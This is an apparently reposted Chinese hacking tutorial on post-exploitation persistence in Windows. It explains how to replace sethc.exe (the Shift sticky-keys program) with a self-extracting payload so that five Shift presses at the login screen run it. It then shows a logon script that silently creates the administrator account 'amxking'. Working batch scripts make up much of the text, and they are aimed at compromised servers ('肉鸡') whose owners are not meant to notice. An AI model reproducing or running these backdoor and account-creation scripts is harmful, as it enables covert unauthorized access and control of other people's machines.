后渗透篇:sethc后门制作和超级帐户的建立(补充节点1)

  • 时间:
  • 来源:互联网
  • 文章标签:

当你的才华

还撑不起你的野心时

那你就应该静下心来学习


目录

sethc后门制作和超级帐户的建立(补充节点1)

0x01 介绍     

0x02 操作演示


 

sethc后门制作和超级帐户的建立(补充节点1)

0x01 介绍     


 

      前段时间去一个流量过百万的站的服务器上参观,朋友加了一个shift后门并称该后门是很久以前他公布的,具体情况我也没多问,回来后自己也做了一个加密码的shift后门.利用winrar加密的.很简单,火力群里一个小弟弟问我怎么做的,叫我写个说明,那么我就简单介绍一下制作过程-Amxking

什么是sethc后门,或者也可以叫Shift后门?

答:

      windows登陆界面的时候连按5次shift就会调出系统的放大镜,shift后门就是替换这个放大镜程序,在登陆界面按5次shift时运行一个木马程序,来新建一个用户,这样就可以登录了,在注销之前在删除这个用户,这样这台电脑的用户不会发现自己的电脑出现问题。

 

0x02 操作演示


1. 我们首先建立一个名为win.rar的压缩包,及一个批处理命令名为AK.bat的文件.
2. 再把这个批处理文件AK.bat加到win.rar压缩包内加密.在高级选项里设置密码如:!@#$%^&
3. 将win.rar做成自解压格式:

      添加新的自解压→Default.SFX 图形界面 RAR自解压模块→高级自解压选项→解压后运行(添加: cmd.exe 也有用SystemRoot\explorer.exe的)→模式→选择:全部隐藏覆盖所有文件→确定
4. 然后我们再建立一个批处理文件RU.BAT,用来将win.exe(win.rar做成自解压后生成的文件)替换到system32下.

      主要实现目的为执行:

copy win.exe C:\WINDOWS\system32\sethc.exe /y
copy win.exe C:\WINDOWS\system32\dllcache\sethc.exe /y
  这是一位网友写的批处理RU.BAT,可以借鉴.都是满简单的.
@echo off
  cls
  copy win.exe C:\WINDOWS\system32\sethc.exe
  copy win.exe C:\WINDOWS\system32\dllcache\sethc.exe
  attrib C:\WINDOWS\system32\sethc.exe sethc.exe
  attrib C:\WINDOWS\system32\dllcache\sethc.exe h
  echo
  cls
  echo.
  del win.exe
  del 0
5. 将RU.BAT及WIN.EXE传到肉鸡上并运行RU.BAT就完成了shift后门的安装.
  关于不死帐号的方法常见的几种中我们今天简单的介绍一种依靠特殊路径开机自动执行BAT命令添加管理帐户的方法.很简单,一看就明白了,这里我也不多做解释了:
  制作批处理文件ad.bat ,代码内容为:
@echo off
  cls
  net user amxking /del
  net user amxking !@#$^&*(000 /add 

注释:

      前面amxking是用户名后面!@#$^&*(000 是密码,如此设置一是安全目的,二是方便通过具有密码策略的效验,注意不要超过14位,否则有些老版本系统不支持;
  net localgroup administrators amxking /add
  将ad.bat上传到肉鸡上,路径为:

C:\WINDOWS\system32\GroupPolicy\User\Scripts\Logon

      这样只要肉鸡服务器重起就会执行ad.bat将我们的帐户添加并提权为管理帐户.也就实现了所谓的不死帐号.
   注意: 路径在具体过程中需要自己修改,别抱着C:\WINDOWS就不变,脑袋要灵活点,哪里是SystemRoot 就改成哪里.^_^
   PS:按5次shift键后门.exe 工具如果再加些功能比如设置密码,那就不用这么麻烦了......


我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重


本文链接http://www.taodudu.cc/news/show-647696.html